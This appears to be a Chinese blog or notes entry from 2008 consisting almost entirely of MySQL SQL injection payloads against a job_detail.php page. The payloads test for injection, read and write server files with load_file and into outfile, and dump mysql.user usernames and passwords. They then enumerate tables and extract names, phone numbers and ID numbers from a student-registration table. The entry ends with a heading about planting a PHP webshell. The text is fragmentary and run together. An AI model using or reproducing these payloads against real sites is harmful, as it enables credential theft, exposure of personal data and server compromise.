2008年02月24日 星期日 22:291.判断是否存在注入,加';and 1=1;and 1=2
union select 1,2,load_file('c:\123.txt'),4,5,6,into outfile'123.php'
current_user() session_user() system_user() @@datadir @@tmpdir @@version_compile_os job_detail.php?InfoId=347 and 1=2 union select
1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8
from (select * from (select * from mysql.user order by user limit
0,1) t order by user desc)t limit 1/* and 1=1 ob_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1 job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 1,1) t order by user desc)t limit 1/* and 1=1 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 4,1) t order by user desc)t limit 1/* and 1=1 /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from information_schema.tables group by table_schema order by table_schema)t limit 1/* and 1=1 | TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |
ENGINE | VERSION | RO 用selelct查询语句查询数据库 /*暴表 job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x73697365 limit 1/* and 1=1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 3,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1
GET /job_detail.php?InfoId=347 and 1=2 union select
1,concat(char(94),char(94),char(94),cast(count(*) as
char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from
information_schema.columns where
table_name=0x6d6174726963756c617465 GET /job_detail.php?InfoId=347 and 1=2 union select
1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1
from (select * from (select * from information_schema.columns where
table_name=0x6d6174726963756c617465 GET /job_detail.php?InfoId=347 and 1=2 union select
1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1
from (select * from (select * from information_schema.columns where
table_name=0x6d6174726963756c617465 /job_detail.php?InfoId=347 and 1=2 union select
1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1
from (select * from (select * from information_schema.columns where
table_name=0x6d6174726963756c617465
GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1 GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1 /*写入php一句话木马
|
|